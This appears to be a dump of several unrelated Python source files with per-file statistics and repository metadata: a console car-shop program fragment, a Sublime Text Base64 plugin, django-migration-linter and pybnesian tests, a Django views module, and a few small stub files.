def printReceipt2():
    """Append the order total and closing footer to the receipt.

    Reads the module-level ``totalCost`` accumulated while shopping.
    """
    # Fix: the original leaked the file handle (never closed); a context
    # manager guarantees the footer is flushed before the receipt is shown.
    with open("receipt.txt", "a") as file:
        file.write("Total Cost: " + str(totalCost) + "\n")
        file.write("*************************" + "\n")
        file.write("Please come again!")
#Receipt Part 3
def printReceipt3():
    """Open the finished receipt in the user's default viewer."""
    # Imported lazily: webbrowser is only needed at checkout time.
    import webbrowser as _browser
    _browser.open("receipt.txt")
#View Cart Part 1
def viewCart1():
    """Start a fresh cart file with an introductory line.

    Opens cart.txt in write mode, truncating any cart left over
    from a previous run.
    """
    # Fix: the original leaked the file handle (never closed); a context
    # manager guarantees the file is flushed and closed.
    with open("cart.txt", "w") as file:
        file.write("These are the current contents of your cart,\n")
#View Cart Part 2
def viewCart2():
    """Open the current cart file in the user's default viewer."""
    # Imported lazily: webbrowser is only needed when the cart is viewed.
    import webbrowser as _browser
    _browser.open("cart.txt")
printReceipt1()
viewCart1()
# ---------------------------------------------------------------------------
# Menu catalogues.  Each entry is (menu label, cart/receipt label, price).
# Prices reference the variables defined above so the menus and the running
# total always agree (the original menu showed "$100" for the Medium
# Electric Motor while charging $1000 — deriving the label fixes that).
# A price of None means the option is free (paint colors).
# ---------------------------------------------------------------------------
engineOptions = [
    ("V-Twin Engine", "V-Twin Engine", vTwinEngineCost),
    ("V-4 Engine", "V-4 Engine", v4EngineCost),
    ("V-6 Engine", "V-6 Engine", v6EngineCost),
    ("V-8 Engine", "V-8 Engine", v8EngineCost),
    ("V-12 Engine", "V-12 Engine", v12EngineCost),
    ("V-16 Engine", "V-16 Engine", v16EngineCost),
    ("Small Electric Motor", "Small Electric Motor", smallElectricMotor),
    ("Medium Electric Motor", "Medium Electric Motor", medElectricMotor),
    ("Large Electric Motor", "Large Electric Motor", largeElectricMotor),
    # Bug fix: choice 10 used to charge v4EngineCost and record "V-4 Engine".
    ("Nuclear Reactor", "Nuclear Reactor", nuclearReactor),
]
chassisOptions = [
    ("Motorcycle Chassis", "Motorcycle", motorcycle),
    ("Sedan Chassis", "Sedan", sedan),
    ("Sports Chassis", "Sports", sports),
    ("Sports Utility Chassis", "Sports Utility", sportsUtility),
    ("Truck Chassis", "Truck", truck),
    ("Luxury Chassis", "Luxury", luxury),
    ("Military Grade Chassis", "Military Grade", militaryGrade),
]
paintOptions = [
    ("Solid Paintjob", "Solid", solid),
    ("Metallic Paintjob", "Metallic", metallic),
    ("Pearlescent Paintjob", "Pearlescent", pearlescent),
    ("Matte Paintjob", "Matte", matte),
    ("Carbon Fiber Paintjob", "Carbon Fiber", carbonFiber),
]
colorOptions = [(color, color, None) for color in colors]
interiorOptions = [
    ("Fabric Interior", "Fabric", fabric),
    ("Pseudo-Leather Interior", "Pseudo-Leather", pLeather),
    ("Leather Interior", "Leather", standardLeather),
    ("Luxury Leather Interior", "Luxury Leather", luxuryLeather),
]

# One-of-each bookkeeping: category name -> already purchased?
purchased = {"Engine": False, "Chassis": False, "Paintjob": False,
             "Paint Color": False, "Interior": False}

def appendToFiles(line):
    """Append one item line to both the cart and the receipt."""
    for path in ("cart.txt", "receipt.txt"):
        with open(path, "a") as file:
            file.write(line)

def runPurchaseMenu(header, options, category, duplicateNoun):
    """Show one category menu, sell at most one item, then return.

    header        -- question printed above the numbered options
    options       -- list of (menu label, cart label, price-or-None) tuples
    category      -- key into `purchased` and prefix for cart/receipt lines
    duplicateNoun -- wording used when the category was already bought
    """
    global totalCost
    while True:
        print (header)
        for number, (label, _, cost) in enumerate(options, start=1):
            if cost is None:
                print ("%d. %s" % (number, label))
            else:
                print ("%d. %s - $%d" % (number, label, cost))
        print ("%d. Return to prior menu" % (len(options) + 1))
        choice = int(input())
        if 1 <= choice <= len(options):
            if purchased[category]:
                print ("You already have " + duplicateNoun +
                       " and may not fit more than one in your car.")
            else:
                label, cartLabel, cost = options[choice - 1]
                if cost is None:
                    appendToFiles(category + ": " + cartLabel + "\n")
                else:
                    totalCost = totalCost + cost
                    appendToFiles(category + ": " + cartLabel + " $" + str(cost) + "\n")
                purchased[category] = True
            return
        elif choice == len(options) + 1:
            # "Return to prior menu"
            return
        else:
            print("Please enter a valid number.")

def runPartMenu():
    """Loop over the part-category menu until the user backs out."""
    while True:
        print ("What type of part would you like to add to your car, remember you can only have one of each?")
        print ("1. Engine Choices")
        print ("2. Chassis Choices")
        print ("3. Paintjob Options")
        print ("4. Color Options")
        print ("5. Interior Variables")
        print ("6. Return to prior menu")
        choice = int(input())
        if choice == 1:
            runPurchaseMenu("What type of Engine would you like to use?",
                            engineOptions, "Engine", "an engine")
        elif choice == 2:
            runPurchaseMenu("What type of Chassis would you like to use?",
                            chassisOptions, "Chassis", "a chassis")
        elif choice == 3:
            runPurchaseMenu("What type of Paintjob would you like to use?",
                            paintOptions, "Paintjob", "a paintjob")
        elif choice == 4:
            # The shop words a duplicate color pick as "a paintjob" too,
            # matching the original messages.
            runPurchaseMenu("What color paint would you like to use?",
                            colorOptions, "Paint Color", "a paintjob")
        elif choice == 5:
            runPurchaseMenu("What type of Interior would you like to use?",
                            interiorOptions, "Interior", "a interior")
        elif choice == 6:
            return
        else:
            print("Please enter a valid number.")

# Main menu: add parts, review the cart, or check out and leave.
while not userExit:
    print ("Welcome to Cecil's Custom Car Consortium!")
    print ("What would you like to do?")
    print ("1. Add an item to your car.")
    print ("2. View your car.")
    print ("3. Checkout and exit.")
    userMenuChoice = int(input())
    if userMenuChoice == 1:
        runPartMenu()
    elif userMenuChoice == 2:
        viewCart2()
    elif userMenuChoice == 3:
        printReceipt2()
        printReceipt3()
        userExit = True
    else:
        print("Please enter a valid number.")
| 53.737481 | 115 | 0.409737 | 2,706 | 35,413 | 5.362158 | 0.072432 | 0.04652 | 0.039145 | 0.063611 | 0.803928 | 0.735217 | 0.733218 | 0.708753 | 0.665679 | 0.598828 | 0 | 0.03431 | 0.502894 | 35,413 | 658 | 116 | 53.819149 | 0.789934 | 0.006551 | 0 | 0.756058 | 0 | 0.001616 | 0.195526 | 0.000724 | 0 | 0 | 0 | 0 | 0 | 1 | 0.008078 | false | 0 | 0.003231 | 0 | 0.011309 | 0.169628 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
588e7e269b235b3b854ca3fa3e72453aa9210bc5 | 792 | py | Python | base64_text.py | akashp1712/sublime_base64 | a6da3004689ac30a36f81afada3462600c1873a4 | [
"MIT"
] | 1 | 2018-01-22T09:12:30.000Z | 2018-01-22T09:12:30.000Z | base64_text.py | akashp1712/sublime_base64 | a6da3004689ac30a36f81afada3462600c1873a4 | [
"MIT"
] | null | null | null | base64_text.py | akashp1712/sublime_base64 | a6da3004689ac30a36f81afada3462600c1873a4 | [
"MIT"
] | null | null | null | import sublime
import sublime_plugin
import base64
class EncodeCommand(sublime_plugin.TextCommand):
    """Replace every selected region with its Base64 encoding."""

    def run(self, edit):
        for sel in self.view.sel():
            raw = self.view.substr(sel)
            # Strip surrounding whitespace, encode as UTF-8, then Base64.
            encoded = base64.b64encode(bytes(raw.strip(), encoding='utf-8')).decode("utf-8")
            self.view.replace(edit, sel, str(encoded))
class DecodeCommand(sublime_plugin.TextCommand):
    """Replace every selected Base64 region with its decoded text."""

    def run(self, edit):
        for sel in self.view.sel():
            raw = self.view.substr(sel)
            # Strip surrounding whitespace, Base64-decode, then decode UTF-8.
            decoded = base64.b64decode(bytes(raw.strip(), encoding='utf-8')).decode("utf-8")
            self.view.replace(edit, sel, str(decoded))
| 37.714286 | 108 | 0.67298 | 97 | 792 | 5.381443 | 0.319588 | 0.091954 | 0.091954 | 0.103448 | 0.812261 | 0.812261 | 0.812261 | 0.812261 | 0.812261 | 0.812261 | 0 | 0.022329 | 0.208333 | 792 | 20 | 109 | 39.6 | 0.810207 | 0 | 0 | 0.588235 | 0 | 0 | 0.025253 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.176471 | 0 | 0.411765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5478effbcf6515e27686904db28c670d219a1895 | 11,464 | py | Python | tests/functional/test_data_migrations.py | passth/django-migration-linter | fa80e87962d0fde10732d1cec784b33bc6339b96 | [
"Apache-2.0"
] | null | null | null | tests/functional/test_data_migrations.py | passth/django-migration-linter | fa80e87962d0fde10732d1cec784b33bc6339b96 | [
"Apache-2.0"
] | null | null | null | tests/functional/test_data_migrations.py | passth/django-migration-linter | fa80e87962d0fde10732d1cec784b33bc6339b96 | [
"Apache-2.0"
] | null | null | null | import os
import unittest
from django.conf import settings
from django.db import migrations
from django_migration_linter import MigrationLinter
from tests import fixtures
class DataMigrationDetectionTestCase(unittest.TestCase):
    """Warning/error bookkeeping when linting RunPython data migrations."""

    def setUp(self, *args, **kwargs):
        self.test_project_path = os.path.dirname(settings.BASE_DIR)
        self.linter = self._build_linter()

    def _build_linter(self, **extra):
        # Every linter in this suite targets the data-migration fixture apps;
        # individual tests layer extra options on top.
        return MigrationLinter(
            self.test_project_path,
            include_apps=fixtures.DATA_MIGRATIONS,
            **extra,
        )

    def _lint(self, migration_name):
        # Look the named migration up on disk and run it through the linter.
        key = ("app_data_migrations", migration_name)
        self.linter.lint_migration(self.linter.migration_loader.disk_migrations[key])

    def test_reverse_data_migration(self):
        self.assertEqual(0, self.linter.nb_warnings)
        self._lint("0002_missing_reverse")
        self.assertEqual(1, self.linter.nb_warnings)
        self.assertFalse(self.linter.has_errors)

    def test_reverse_data_migration_ignore(self):
        self._lint("0003_incorrect_arguments")
        self.assertEqual(1, self.linter.nb_warnings)
        self.assertFalse(self.linter.has_errors)

    def test_exclude_warning_from_test(self):
        self.linter = self._build_linter(
            exclude_migration_tests=("RUNPYTHON_REVERSIBLE",),
        )
        self._lint("0002_missing_reverse")
        self.assertEqual(0, self.linter.nb_warnings)
        self.assertEqual(1, self.linter.nb_valid)
        self.assertFalse(self.linter.has_errors)

    def test_all_warnings_as_errors(self):
        self.linter = self._build_linter(all_warnings_as_errors=True)
        self._lint("0003_incorrect_arguments")
        self.assertEqual(0, self.linter.nb_warnings)
        self.assertEqual(1, self.linter.nb_erroneous)
        self.assertTrue(self.linter.has_errors)

    def test_warnings_as_errors_tests_matches(self):
        self.linter = self._build_linter(
            warnings_as_errors_tests=["RUNPYTHON_ARGS_NAMING_CONVENTION"],
        )
        self._lint("0003_incorrect_arguments")
        self.assertEqual(0, self.linter.nb_warnings)
        self.assertEqual(1, self.linter.nb_erroneous)
        self.assertTrue(self.linter.has_errors)

    def test_warnings_as_errors_tests_no_match(self):
        self.linter = self._build_linter(
            warnings_as_errors_tests=[
                "RUNPYTHON_MODEL_IMPORT",
                "RUNPYTHON_MODEL_VARIABLE_NAME",
            ],
        )
        self._lint("0003_incorrect_arguments")
        self.assertEqual(1, self.linter.nb_warnings)
        self.assertEqual(0, self.linter.nb_erroneous)
        self.assertFalse(self.linter.has_errors)
class DataMigrationModelImportTestCase(unittest.TestCase):
    """Checks for MigrationLinter.get_runpython_model_import_issues().

    Each test defines a nested RunPython-style forward function and asks the
    linter how many model-import issues it finds in it.  NOTE(review): the
    linter presumably analyses the nested functions' own source, so their
    bodies must stay exactly as written — do not reformat or comment them.
    """

    def test_missing_get_model_import(self):
        """A direct model import (instead of apps.get_model) is one issue."""
        def incorrect_importing_model_forward(apps, schema_editor):
            from tests.test_project.app_data_migrations.models import MyModel
            MyModel.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_import_issues(
            incorrect_importing_model_forward
        )
        self.assertEqual(1, len(issues))

    def test_correct_get_model_import(self):
        """apps.get_model calls, including multi-line ones, raise no issue."""
        def correct_importing_model_forward(apps, schema_editor):
            MyModel = apps.get_model("app_data_migrations", "MyModel")
            MyVeryLongLongLongModel = apps.get_model(
                "app_data_migrations", "MyVeryLongLongLongModel"
            )
            MultiLineModel = apps.get_model(
                "app_data_migrations",
                "MultiLineModel",
            )
            MyModel.objects.filter(id=1).first()
            MyVeryLongLongLongModel.objects.filter(id=1).first()
            MultiLineModel.objects.all()
        issues = MigrationLinter.get_runpython_model_import_issues(
            correct_importing_model_forward
        )
        self.assertEqual(0, len(issues))

    def test_not_overlapping_model_name(self):
        """
        Correct for the import error, but should raise a warning
        (variable name does not match the fetched model name).
        """
        def forward_method(apps, schema_editor):
            User = apps.get_model("auth", "CustomUserModel")
            User.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_import_issues(forward_method)
        self.assertEqual(0, len(issues))

    def test_correct_one_param_get_model_import(self):
        """The single 'app.Model' argument form also raises no issue."""
        def forward_method(apps, schema_editor):
            User = apps.get_model("auth.User")
            User.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_import_issues(forward_method)
        self.assertEqual(0, len(issues))

    def test_not_overlapping_one_param(self):
        """
        Not an error, but should raise a warning
        (variable name does not match the fetched model name).
        """
        def forward_method(apps, schema_editor):
            User = apps.get_model("auth.CustomUserModel")
            User.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_import_issues(forward_method)
        self.assertEqual(0, len(issues))
class DataMigrationModelVariableNamingTestCase(unittest.TestCase):
    """Checks for MigrationLinter.get_runpython_model_variable_naming_issues().

    The rule under test: the variable receiving apps.get_model(...) should be
    named after the model.  NOTE(review): the linter presumably analyses the
    nested functions' own source, so their bodies must stay exactly as
    written — do not reformat or comment them.
    """

    def test_same_variable_name(self):
        """Variable named exactly like the model: no issue."""
        def forward_op(apps, schema_editor):
            MyModel = apps.get_model("app", "MyModel")
            MyModel.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
        self.assertEqual(0, len(issues))

    def test_same_variable_name_multiline(self):
        """Matching name with the call split over two lines: no issue."""
        def forward_op(apps, schema_editor):
            MyModelVeryLongLongLongLongLong = apps.get_model(
                "app", "MyModelVeryLongLongLongLongLong"
            )
            MyModelVeryLongLongLongLongLong.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
        self.assertEqual(0, len(issues))

    def test_same_variable_name_multiline2(self):
        """Matching name with every argument on its own line: no issue."""
        def forward_op(apps, schema_editor):
            MyModelVeryLongLongLongLongLong = apps.get_model(
                "app_name_longlonglonglongapp",
                "MyModelVeryLongLongLongLongLong",
            )
            MyModelVeryLongLongLongLongLong.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
        self.assertEqual(0, len(issues))

    def test_different_variable_name(self):
        """Variable name differing from the model name: one issue."""
        def forward_op(apps, schema_editor):
            some_model = apps.get_model("app", "MyModel")
            some_model.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
        self.assertEqual(1, len(issues))

    def test_diff_variable_name_multiline(self):
        """Mismatched name with a two-line call: one issue."""
        def forward_op(apps, schema_editor):
            MyModelVeryLongLongLongLongLongNot = apps.get_model(
                "app", "MyModelVeryLongLongLongLongLong"
            )
            MyModelVeryLongLongLongLongLongNot.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
        self.assertEqual(1, len(issues))

    def test_diff_variable_name_multiline2(self):
        """Mismatched name with arguments on separate lines: one issue."""
        def forward_op(apps, schema_editor):
            MyModelVeryLongLongLongLongLongNot = apps.get_model(
                "app_name_longlonglonglongapp",
                "MyModelVeryLongLongLongLongLong",
            )
            MyModelVeryLongLongLongLongLongNot.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
        self.assertEqual(1, len(issues))

    def test_same_variable_name_one_param(self):
        """Matching name with the single 'app.Model' argument form: no issue."""
        def forward_op(apps, schema_editor):
            MyModel = apps.get_model("app.MyModel")
            MyModel.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
        self.assertEqual(0, len(issues))

    def test_different_variable_name_one_param(self):
        """Mismatched (lower-case) name with the one-argument form: one issue."""
        def forward_op(apps, schema_editor):
            mymodel = apps.get_model("app.MyModel")
            mymodel.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
        self.assertEqual(1, len(issues))

    def test_correct_variable_name_one_param_multiline(self):
        """Matching name, one-argument form split over lines: no issue."""
        def forward_op(apps, schema_editor):
            AVeryLongModelName = apps.get_model(
                "quite_long_app_name.AVeryLongModelName"
            )
            AVeryLongModelName.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
        self.assertEqual(0, len(issues))

    def test_different_variable_name_one_param_multiline(self):
        """Mismatched short name, one-argument form split over lines: one issue."""
        def forward_op(apps, schema_editor):
            m = apps.get_model(
                "quite_long_app_name_name_name.AVeryLongModelNameNameName"
            )
            m.objects.filter(id=1).first()
        issues = MigrationLinter.get_runpython_model_variable_naming_issues(forward_op)
        self.assertEqual(1, len(issues))
class RunSQLMigrationTestCase(unittest.TestCase):
    """Linting of raw-SQL (RunSQL) migration operations."""

    def setUp(self):
        project_root = os.path.dirname(settings.BASE_DIR)
        self.linter = MigrationLinter(
            project_root,
            include_apps=fixtures.DATA_MIGRATIONS,
        )

    def _lint_sql(self, sql):
        # Wrap the raw SQL in a RunSQL operation and lint it,
        # returning the (errors, ignored, warnings) triple.
        return self.linter.lint_runsql(migrations.RunSQL(sql))

    def test_missing_reserve_migration(self):
        errors, ignored, warnings = self._lint_sql("sql;")
        self.assertEqual("RUNSQL_REVERSIBLE", warnings[0]["code"])

    def test_sql_linting_error(self):
        errors, ignored, warnings = self._lint_sql("ALTER TABLE t DROP COLUMN t;")
        self.assertEqual("DROP_COLUMN", errors[0]["code"])

    def test_sql_linting_error_array(self):
        errors, ignored, warnings = self._lint_sql(
            ["ALTER TABLE t DROP COLUMN c;", "ALTER TABLE t RENAME COLUMN c;"]
        )
        self.assertEqual("DROP_COLUMN", errors[0]["code"])
        self.assertEqual("RENAME_COLUMN", errors[1]["code"])

    def test_sql_linting_error_args(self):
        errors, ignored, warnings = self._lint_sql(
            [("ALTER TABLE %s DROP COLUMN %s;", ("t", "c"))]
        )
        self.assertEqual("DROP_COLUMN", errors[0]["code"])
| 36.509554 | 87 | 0.679606 | 1,248 | 11,464 | 5.922276 | 0.106571 | 0.052767 | 0.032472 | 0.034637 | 0.854553 | 0.818834 | 0.78122 | 0.748613 | 0.731701 | 0.704911 | 0 | 0.008282 | 0.231158 | 11,464 | 313 | 88 | 36.626198 | 0.83027 | 0.008461 | 0 | 0.530702 | 0 | 0 | 0.090901 | 0.042049 | 0 | 0 | 0 | 0 | 0.162281 | 1 | 0.184211 | false | 0 | 0.092105 | 0 | 0.29386 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
54b94c4fc0682e1c71e7b10cec7d1e46aa75d890 | 101 | py | Python | misago/misago/threads/permissions/__init__.py | vascoalramos/misago-deployment | 20226072138403108046c0afad9d99eb4163cedc | [
"MIT"
] | 2 | 2021-03-06T21:06:13.000Z | 2021-03-09T15:05:12.000Z | misago/misago/threads/permissions/__init__.py | vascoalramos/misago-deployment | 20226072138403108046c0afad9d99eb4163cedc | [
"MIT"
] | null | null | null | misago/misago/threads/permissions/__init__.py | vascoalramos/misago-deployment | 20226072138403108046c0afad9d99eb4163cedc | [
"MIT"
] | null | null | null | from .bestanswers import *
from .privatethreads import *
from .threads import *
from .polls import *
| 20.2 | 29 | 0.762376 | 12 | 101 | 6.416667 | 0.5 | 0.38961 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.158416 | 101 | 4 | 30 | 25.25 | 0.905882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
54bb6ad55bb7a1fa11ec7d6686b1f255b893ea58 | 4,622 | py | Python | tests/dataset/holdout_test.py | vishalbelsare/PyBNesian | 0190cd4cf6d133746741e2750004ccf0a9061fbd | [
"MIT"
] | null | null | null | tests/dataset/holdout_test.py | vishalbelsare/PyBNesian | 0190cd4cf6d133746741e2750004ccf0a9061fbd | [
"MIT"
] | null | null | null | tests/dataset/holdout_test.py | vishalbelsare/PyBNesian | 0190cd4cf6d133746741e2750004ccf0a9061fbd | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import pybnesian as pbn
import util_test
# Number of rows in the shared synthetic dataset used by every test below.
SIZE = 10000
# Module-level fixture built by the test utilities (presumably normal draws
# over columns a-d — see util_test.generate_normal_data).  Note that
# test_holdout_null mutates this frame in place.
df = util_test.generate_normal_data(SIZE)
def test_holdout_disjoint():
    """Train/test splits partition the data and honor the requested ratio."""
    def check_split(hold, ratio):
        # Sizes must add up to SIZE and follow the ratio exactly.
        train_df, test_df = hold.training_data(), hold.test_data()
        assert (train_df.num_rows + test_df.num_rows) == SIZE, "HoldOut do not have the expected number of rows"
        assert train_df.num_rows == round((1-ratio) * df.shape[0]), "Train DataFrame do not have the expected number of instances"
        assert test_df.num_rows == round(ratio * df.shape[0]), "Test DataFrame do not have the expected number of instances"
        # Concatenating both parts (ignoring order) must recover the input.
        combination = pd.concat([train_df.to_pandas(), test_df.to_pandas()])
        assert df.sort_values("a", axis=0).reset_index(drop=True).equals(
            combination.sort_values("a", axis=0).reset_index(drop=True)
        ), "The combination of train and test dataset is not equal to the original DataFrame."

    check_split(pbn.HoldOut(df), 0.2)                  # default test ratio
    check_split(pbn.HoldOut(df, test_ratio=0.3), 0.3)  # explicit test ratio
def test_holdout_seed():
    """Equal seeds reproduce the same split; different seeds do not."""
    def split_with(seed):
        hold = pbn.HoldOut(df, seed=seed)
        return hold.training_data(), hold.test_data()

    train_a, test_a = split_with(0)
    train_b, test_b = split_with(0)
    assert train_a.equals(train_b), "Train CV DataFrames with the same seed are not equal."
    assert test_a.equals(test_b), "Test CV DataFrames with the same seed are not equal."

    train_c, test_c = split_with(1)
    assert not train_a.equals(train_c), "Train CV DataFrames with different seeds return the same result."
    assert not test_a.equals(test_c), "Test CV DataFrames with different seeds return the same result."
def test_holdout_null():
    """Rows containing nulls are excluded by default, kept with include_null=True."""
    np.random.seed(0)
    # Inject NaNs at 100 random positions of each column.  NOTE: `df_null`
    # aliases the module-level `df`, so this mutates the shared fixture —
    # same behavior as the original test.
    df_null = df
    for column in ('a', 'b', 'c', 'd'):
        null_rows = np.random.randint(0, SIZE, size=100)
        df_null.loc[df_null.index[null_rows], column] = np.nan
    non_null = df_null.dropna()

    # Default: only complete rows participate in the split.
    hold = pbn.HoldOut(df_null)
    train_part, test_part = hold.training_data(), hold.test_data()
    assert (train_part.num_rows + test_part.num_rows) == non_null.shape[0], "HoldOut do not have the expected number of rows"
    assert train_part.num_rows == round((1-0.2) * non_null.shape[0]), "Train DataFrame do not have the expected number of instances"
    assert test_part.num_rows == round(0.2 * non_null.shape[0]), "Test DataFrame do not have the expected number of instances"
    combination = pd.concat([train_part.to_pandas(), test_part.to_pandas()])
    assert combination.sort_values("a", axis=0).reset_index(drop=True).equals(
        non_null.sort_values("a", axis=0).reset_index(drop=True)
    ), "The combination of train and test dataset is not equal to the original DataFrame."

    # include_null=True: every row, nulls included, is split.
    hold_null = pbn.HoldOut(df_null, include_null=True)
    train_part, test_part = hold_null.training_data(), hold_null.test_data()
    assert (train_part.num_rows + test_part.num_rows) == SIZE, "HoldOut do not have the expected number of rows"
    assert train_part.num_rows == round((1-0.2) * SIZE), "Train DataFrame do not have the expected number of instances"
    assert test_part.num_rows == round(0.2 * SIZE), "Test DataFrame do not have the expected number of instances"
    combination = pd.concat([train_part.to_pandas(), test_part.to_pandas()])
    assert combination.sort_values(["a", "b", "c", "d"], axis=0).reset_index(drop=True).equals(
        df.sort_values(["a", "b", "c", "d"], axis=0).reset_index(drop=True)
    ), "The combination of train and test dataset is not equal to the original DataFrame."
| 47.649485 | 130 | 0.694505 | 754 | 4,622 | 4.071618 | 0.111406 | 0.043322 | 0.046906 | 0.046906 | 0.800326 | 0.776222 | 0.765147 | 0.763192 | 0.698371 | 0.641694 | 0 | 0.020053 | 0.180009 | 4,622 | 97 | 131 | 47.649485 | 0.789974 | 0 | 0 | 0.287879 | 1 | 0 | 0.267791 | 0 | 0 | 0 | 0 | 0 | 0.30303 | 1 | 0.045455 | false | 0 | 0.060606 | 0 | 0.106061 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
49b3a47920c87fb1b92137688cc672b47313fd5f | 34 | py | Python | deeplearning/main.py | g2udevelopment/Udacity | 6d706b8d2d3a8b3430b49554f5f49b5a45eee6d3 | [
"MIT"
] | null | null | null | deeplearning/main.py | g2udevelopment/Udacity | 6d706b8d2d3a8b3430b49554f5f49b5a45eee6d3 | [
"MIT"
] | null | null | null | deeplearning/main.py | g2udevelopment/Udacity | 6d706b8d2d3a8b3430b49554f5f49b5a45eee6d3 | [
"MIT"
] | null | null | null | import numpy as np
print("Hello") | 11.333333 | 18 | 0.735294 | 6 | 34 | 4.166667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.147059 | 34 | 3 | 19 | 11.333333 | 0.862069 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 6 |
49b9e8871c7dbcee16e6cae9c31f838cf0593a56 | 136 | py | Python | office365/sharepoint/fields/field_url.py | wreiner/Office365-REST-Python-Client | 476bbce4f5928a140b4f5d33475d0ac9b0783530 | [
"MIT"
] | 544 | 2016-08-04T17:10:16.000Z | 2022-03-31T07:17:20.000Z | office365/sharepoint/fields/field_url.py | wreiner/Office365-REST-Python-Client | 476bbce4f5928a140b4f5d33475d0ac9b0783530 | [
"MIT"
] | 438 | 2016-10-11T12:24:22.000Z | 2022-03-31T19:30:35.000Z | office365/sharepoint/fields/field_url.py | wreiner/Office365-REST-Python-Client | 476bbce4f5928a140b4f5d33475d0ac9b0783530 | [
"MIT"
] | 202 | 2016-08-22T19:29:40.000Z | 2022-03-30T20:26:15.000Z | from office365.sharepoint.fields.field import Field
class FieldUrl(Field):
    """A field whose value contains a URL."""
    pass
| 19.428571 | 51 | 0.727941 | 18 | 136 | 5.5 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026786 | 0.176471 | 136 | 6 | 52 | 22.666667 | 0.857143 | 0.286765 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
49cc6da95792f45abbd948a57dd04005d01473c5 | 406 | py | Python | Poetry_AE/views.py | ToBeADevOps/pacp | 870a665773c541a69ab87e94abfc184600a18487 | [
"MIT"
] | null | null | null | Poetry_AE/views.py | ToBeADevOps/pacp | 870a665773c541a69ab87e94abfc184600a18487 | [
"MIT"
] | null | null | null | Poetry_AE/views.py | ToBeADevOps/pacp | 870a665773c541a69ab87e94abfc184600a18487 | [
"MIT"
] | null | null | null | from django.shortcuts import render
def index(request):
    """Render the ``index.html`` template."""
    template = "index.html"
    return render(request, template)
def About(request):
    """Render the ``about.html`` template."""
    template = "about.html"
    return render(request, template)
def Sidebar_Left(request):
    """Render the ``sidebar-left.html`` template."""
    template = "sidebar-left.html"
    return render(request, template)
def Contact(request):
    """Render the ``contact.html`` template."""
    template = "contact.html"
    return render(request, template)
def Sidebar_Right(request):
    """Render the ``sidebar-right.html`` template."""
    template = "sidebar-right.html"
    return render(request, template)
